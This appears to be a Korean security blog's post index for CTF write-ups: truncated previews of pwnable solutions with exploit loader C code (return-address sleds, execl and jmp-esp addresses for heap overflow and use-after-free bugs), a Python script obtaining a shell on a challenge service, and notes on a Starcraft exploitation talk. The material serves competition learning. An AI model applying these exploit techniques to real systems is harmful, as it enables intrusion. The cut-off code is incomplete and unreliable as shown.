Category : Pwnables Summary : overwrite function pointer in heap by heap overflow or use-after-free, lift esp + ret sleding loader.c#include #define RET "\x37\x93\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x40\x2e\x0f\x40"//#define EXECL "\x50\x24\x0f\x40"#define BINARY "\x74\x81\x04..
View All
Category : Pwnables Summary : clear game, overwrite any 4byte memory except 0x0804XXXX, _exit calls %gs + 0x14, lift esp + ret sleding loader.c#include #define RET "\x20\x99\x04\x08" // 0x08049920 retn#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET #define JMPESP "\x7d\x2a\x08\x40" // 0x40082a7d: jmp *%esp#defi..
2013/07/13에 진행된 제 8회 Codeengn 컨퍼런스에서 발표했던 'Pwning multiplayer game - case Starcraft Broodwar' 시연영상 및 발표자료입니다. Pwning multiplayer game - case Starcraft Broodwar 발표자 : pwn3r / pwn3r.tistory.com 최근 국내/외에서는 멀티플레이어 게임이 유명세를 타고 있다. 이에 맞게 멀티플레이어 게임에 대한 보안 기술 역시 발전하고 있지만, 일반적으로 게임 보안은 게임의 룰을 깨버릴 수 있는 어뷰징(Abusing) 버그를 막는 데 주력하고 있다. 많은 멀티플레이어 게임들이 어뷰징 버그를 막는데 주력하느라, 게임 클라이언트의 취약성에 대한 보안을 놓치고 있다. 게..
작년(2013년) 호서대학교에서 주최한 청소년 해킹대회인 Hischall2013이 끝나고 write-up ㅋㅋ 블로그도 다시 시작하는 겸해서 뒤늦게나마 정리해서 올려둡니다. Write-up
hischall2013과 마찬가지로 작년에 참가했던 대회입니다 ㅋㅋ 혁주, 상섭이, 대진형과 함께 4인 팀으로 참가해서 같이 밤샜던 기억이 나네요. 본선가서 좋은 결과는 못 얻었지만 나름 재밌었음 ㅋㅋ 예전 문제들 다시 풀어보면서 write-up 가다듬어서 올립니다. Write-up
이번에 처음 열린 새로운 청소년 해킹방어대회인 Junior CTF 예선에 참가하여 본선에 진출하게 됬습니다. 저는 부계정으로 많이쓰는 bean1234로 대회를 참가했는데 닉네임 콩답게 2위로 마무리 지었습니다. 예선전 상위 30명은 8월 12일 열리는 본선대회 참가권을 얻게됩니다. 이번 대회운영은 Offensive research center인 Grayhash에서 맡아주셨는데, 창의력을 요하는 문제를 많이 내주셔서 재밌게 풀었습니다. 특히, 게싱문제가 하나도 없어서 짜증한번 안내고 예선을 마무리 지을 수 있었죠 ㅋㅋ 평소에 대회 쓸어가던 친구들이 이번엔 개인일정으로 인해 못 나올뻔 했는데, 수업전이랑 쉬는 시간에 조금씩 조금씩하더니 금방 올클리어를 찍어버렸네요 -_- ㅋㅋ 힘든 본선이 될거 같습니다. 열..
Category : Pwnables Summary : signal handler, use-after-free, lift esp to argv loader.c #include #define RET "\xbb\x8b\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x90\x42\x0e\x40"#define BINARY "\x74\x81\x04\x08" // &"GNU" char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 ..
Category : Pwnables Summary : 5byte command Exploit#!/usr/bin/python from socket import * HOST = "192.168.123.134"PORT = 7879 cmd = "" s = socket(AF_INET, SOCK_STREAM)s.connect((HOST, PORT))s.send("sh&4\n")while 1:cmd = raw_input("$ ")if cmd == "exit":breakelse:s.send(cmd+"\n")print s.recv(1024)s.close() root@ubuntu:~/givemeshell# ./exploit.py $ iduid=1005(givemeshell) gid=1005(givemeshell) grou..